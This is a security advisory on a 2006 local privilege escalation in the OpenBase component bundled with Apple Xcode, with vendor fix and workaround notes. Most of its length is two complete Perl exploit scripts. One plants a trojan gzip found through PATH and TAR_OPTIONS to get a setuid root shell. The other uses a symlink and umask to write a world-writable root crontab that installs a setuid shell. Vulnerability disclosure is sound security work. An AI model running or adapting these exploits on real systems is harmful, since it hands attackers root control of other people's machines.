Apple Xcode WebObjects Plugin Privilege Escalation Vulnerability
Release date: 2006-10-16
Updated: 2006-10-18
Affected systems:
Apple XCode 2.2
OpenBase OpenBase 9.1.5_MacOSX
OpenBase OpenBase 8.0.4_MacOSX
OpenBase OpenBase 7.0.15_MacOSX
Unaffected systems:
OpenBase OpenBase 10.0_MacOSX
Apple XCode 2.3
Description:
BUGTRAQ ID: 20562
Xcode is the development tool used on Apple machines.
Xcode contains a vulnerability in the way it invokes external tools with elevated privileges; a local attacker could exploit it to elevate their privileges.
Xcode uses OpenBase to provide additional functionality for the WebObjects component. The OpenBase library does not handle its setuid privileges correctly when it invokes /Library/OpenBase/bin/gnutar: gnutar is called while OpenBase is running with euid=0. Through the TAR_OPTIONS environment variable, gnutar can be made to invoke gzip without a specified path, so an attacker who controls the PATH variable can obtain root privileges.
<*Source: Kevin Finisterre (dotslash@snosoft.com)
Links: http://secunia.com/advisories/22390/
http://secunia.com/advisories/22474/
http://marc.theaimsgroup.com/?l=full-disclosure&m=116105915801623&q=p3
*>
Test method:
Warning
The following programs (methods) may be offensive in nature and are provided for security research and teaching only. Users bear the risk themselves!
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
# http://docs.info.apple.com/article.html?artnum=61798 (This won't help)
# ftp://www.openbase.com/pub/OpenBase_10.0 (This will)
#
# This is an exploit for a 3rd party program that has been bundled with Xcode on several occasions.
# The OpenBase binary calls gnutar while running with euid=0 by passing TAR_OPTIONS we can cause gzip to be
# invoked. Since no path is specified we can export PATH=/path/to/trojan:$PATH in order to take root.
$binpath = "/Library/OpenBase/bin/OpenBase"; # Typical location.
# In this instance targets are really pointless but I wanted to archive known vulnerable versions while testing.
$tgts{"0"} = "xcode_2-1.2_8m654_018213974.dmg:$binpath ";
$tgts{"1"} = "OpenBase9.1.5_MacOSX.dmg:$binpath ";
$tgts{"2"} = "OpenBase8.0.4_MacOSX.dmg:$binpath ";
$tgts{"3"} = "OpenBase7.0.15_MacOSX.dmg:$binpath ";
unless (($target) = @ARGV) {
print "\n\nUsage: $0 <target> \n\nTargets:\n\n";
foreach $key (sort(keys %tgts)) {
($a,$b) = split(/\:/,$tgts{"$key"});
print "\t$key . $a\n";
}
print "\n";
exit 1;
}
$ret = pack("l", ($retval));
($a,$b) = split(/\:/,$tgts{"$target"});
print "*** Target: $a $b\n";
open(OP,">/tmp/proactive.c");
printf OP "main()\n";
printf OP "{ seteuid(0); setegid(0); setuid(0); setgid(0); system(\"/bin/sh -i\"); }\n";
system("gcc -o /tmp/shX /tmp/proactive.c");
open(OP,">/tmp/or_really_reactive.c");
printf OP "main()\n";
printf OP "{ system(\"chown root: /tmp/shX; chmod 4755 /tmp/shX; rm -rf /tmp/or_really_reactive.c /tmp/proactive.c /tmp/pwndertino.* /tmp/gzip\"); }\n";
system("gcc -o /tmp/gzip /tmp/or_really_reactive.c");
system("mkdir /tmp/pwndertino.db");
system("echo \"Way to proactively audit 3rd party binaries before cramming them into a release \"> /tmp/pwndertino.db/port");
system("echo \"I wonder how long these vulnerable suids have been bundled with xcode \"> /tmp/pwndertino.db/encoding");
system("echo \"All your Mac are belong to us \"> /tmp/pwndertino.db/threads");
system("echo \"Welcome to pwndertino \"> /tmp/pwndertino.db/notification");
system("echo \"For the protection of our customers, Apple does not disclose, discuss, or confirm security issues until a full investigation has occurred and any necessary patches or releases are available \"> /tmp/pwndertino.db/simulationMode");
system("echo \"To learn more about Apple Product Security, see the Apple Computer Product Security Incident Response website\" > /tmp/pwndertino.db/safe_sql_mode");
system("export TAR_OPTIONS=\"-zv /etc/master.passwd\"; export PATH=/tmp:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin;$b ../../../../../../tmp/pwndertino");
system("/tmp/shX");
==============================================
#!/usr/bin/perl
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
# http://docs.info.apple.com/article.html?artnum=61798 (This won't help)
# ftp://www.openbase.com/pub/OpenBase_10.0 (This will)
#
# Create a new file anywhere on the filesystem with rw-rw-rw privs.
# Sorry you can NOT overwrite existing files.
#
# Writing to roots crontab seems to be fairly prompt at handing out root shells
# Make sure that you get cron running by first creating a user crontab!
#
# This is an exploit for a 3rd party program that has been bundled with Xcode on several
# occasions. The OpenBase binary creates a root owned log file 'simulation.sql' in the database path.
# Since we control the database path via directory transversal and we also control the umask we can
# create a file anywhere on the filesystem that is rw-rw-rw and owned by root.
#
# Following symlinks is bad mmmmmmmmmmkay!
$dest = "/var/cron/tabs/root";
$binpath = "/Library/OpenBase/bin/OpenBase"; # Typical location.
# In this instance targets are really pointless but I wanted to archive known vulnerable versions while testing.
$tgts{"0"} = "xcode_2-1.2_8m654_018213974.dmg:$binpath ";
$tgts{"1"} = "OpenBase9.1.5_MacOSX.dmg:$binpath ";
$tgts{"2"} = "OpenBase8.0.4_MacOSX.dmg:$binpath ";
$tgts{"3"} = "OpenBase7.0.15_MacOSX.dmg:$binpath ";
unless (($target) = @ARGV) {
print "\n\nUsage: $0 <target> \n\nTargets:\n\n";
foreach $key (sort(keys %tgts)) {
($a,$b) = split(/\:/,$tgts{"$key"});
print "\t$key . $a\n";
}
print "\n";
exit 1;
}
$ret = pack("l", ($retval));
($a,$b) = split(/\:/,$tgts{"$target"});
print "*** Target: $a $b\n";
open(OP,">/tmp/proactive.c");
printf OP "main()\n";
printf OP "{ seteuid(0); setegid(0); setuid(0); setgid(0); system(\"/bin/sh -i\"); }\n";
system("gcc -o /Users/Shared/shX /tmp/proactive.c");
# Create a user crontab FIRST! This ensures that cron is running when the fake root crontab is created. Aka semi-insta-root (in a minute)
system("echo '* * * * * /usr/bin/id > /tmp/aa' > /tmp/user_cron");
system("crontab /tmp/user_cron");
system("mkdir /tmp/pwndertino.db");
system("echo \"Way to proactively audit 3rd party binaries before cramming them into a release \"> /tmp/pwndertino.db/port");
system("echo \"I wonder how long these vulnerable suids have been bundled with xcode \"> /tmp/pwndertino.db/encoding");
system("echo \"All your Mac are belong to us \"> /tmp/pwndertino.db/threads");
system("echo \"Welcome to pwndertino \"> /tmp/pwndertino.db/notification");
system("echo \"For the protection of our customers, Apple does not disclose, discuss, or confirm security issues until a full investigation has occurred and any necessary patches or releases are available \"> /tmp/pwndertino.db/simulationMode");
system("echo \"To learn more about Apple Product Security, see the Apple Computer Product Security Incident Response website\" > /tmp/pwndertino.db/safe_sql_mode");
# The umask is where the lovin occurs. I'm rw-rw-rw James bitch!!
system("rm -rf /tmp/pwndertino.sim; mkdir /tmp/pwndertino.sim; ln -s $dest /tmp/pwndertino.sim/simulation.sql");
system("umask 111; export TAR_OPTIONS=\"-v \"; export PATH=/tmp:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin;$b ../../../../../../tmp/pwndertino");
print "$dest should be rw-rw-rw ... enjoy!\n";
print "installing trojan crontab for root\n";
system("echo '* * * * * /usr/sbin/chown root: /Users/Shared/shX; /bin/chmod 4755 /Users/Shared/shX' > /var/cron/tabs/root");
print "sit around and chill for a minute then check /Users/Shared/shX !\n";
sleep 60 ;
system("/Users/Shared/shX");
Recommendations:
Temporary workaround:
* Remove the setuid flag from OpenBase.
Vendor patch:
OpenBase
--------
The vendor has released an upgrade patch that fixes this security issue; please download it from the vendor's homepage:
ftp://www.openbase.com/pub/OpenBase_10.0
NSFOCUS: your guarantee of security
